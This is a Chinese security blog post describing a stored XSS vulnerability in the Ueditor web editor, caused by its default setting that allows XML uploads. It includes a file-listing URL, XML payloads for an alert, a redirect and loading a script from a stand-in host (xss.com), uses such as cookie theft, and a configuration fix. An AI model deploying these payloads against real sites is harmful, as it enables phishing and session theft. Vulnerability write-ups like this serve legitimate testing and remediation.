Ueditor最新版XML文件上传导致存储型XSS

Posted 安译Sec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Ueditor最新版XML文件上传导致存储型XSS相关的知识,希望对你有一定的参考价值。

上个月测试某个系统碰到了,以为是0day,Google了下发现早已有人发过了。见:
https://blog.csdn.net/qq_39101049/article/details/97684968



下载源码并搭建环境

测试版本:php版 v1.4.3.3,jsp版(当时忘了看版本)
下载地址:https://github.com/fex-team/ueditor
IP:192.168.10.1
自定义的目录:ueditor1433(实际过程中请注意观察)
不用安装和配置,直接打开就用,不过上传文件的路径需要注意下


测试过程

Ueditor最新版XML文件上传导致存储型XSS
Ueditor最新版XML文件上传导致存储型XSS
Ueditor最新版XML文件上传导致存储型XSS
访问触发弹窗,可以改成下面其他代码测试
Ueditor最新版XML文件上传导致存储型XSS
有时候上传访问不了找不到路径可以访问如下url把文件目录列出来再拼接,实际过程中请注意controller.xxx的访问路径
 
   
   
 
http://192.168.10.1/ueditor1433/php/controller.php?action=listfile

常见利用代码

 
   
   
 
弹窗
  
    
    
  
<html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml"> alert(1); </something:script> </body> </html> URL跳转 <html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml"> window.location.href="https://www.t00ls.net/"; </something:script> </body> </html> 远程加载Js <html> <head></head> <body> <something:script src="http://xss.com/xss.js" xmlns:something="http://www.w3.org/1999/xhtml"> </something:script> </body> </html>
 
   
   
 

漏洞修复

可以看到在config.json配置文件里xml文件类型默认是可被上传的,所以去掉重启下应用或者服务器就好了


实战意义

个人认为这个洞危害不是很大,不过可应用于以下实战场景,如果有其他好玩的场景或者组合拳大牛萌可以回复
  • 安服仔实在没漏洞的时候凑漏洞
  • URL跳转钓鱼
  • 远程加载js打Cookie或者其他操作

以上是关于Ueditor最新版XML文件上传导致存储型XSS的主要内容,如果未能解决你的问题,请参考以下文章

上传Word文件形成存储型XSS路径

DocCms存储型XSS+后台任意文件下载上传+目录删除+sql执行(有条件可getshell)

Dedecms 最新版本存储型xss+csrf(直接写shell)

php7下新版Ueditor

6.XSS攻击方式及防御措施

Ueditor结合七牛云存储上传图片附件和图片在线管理的实现和最新更新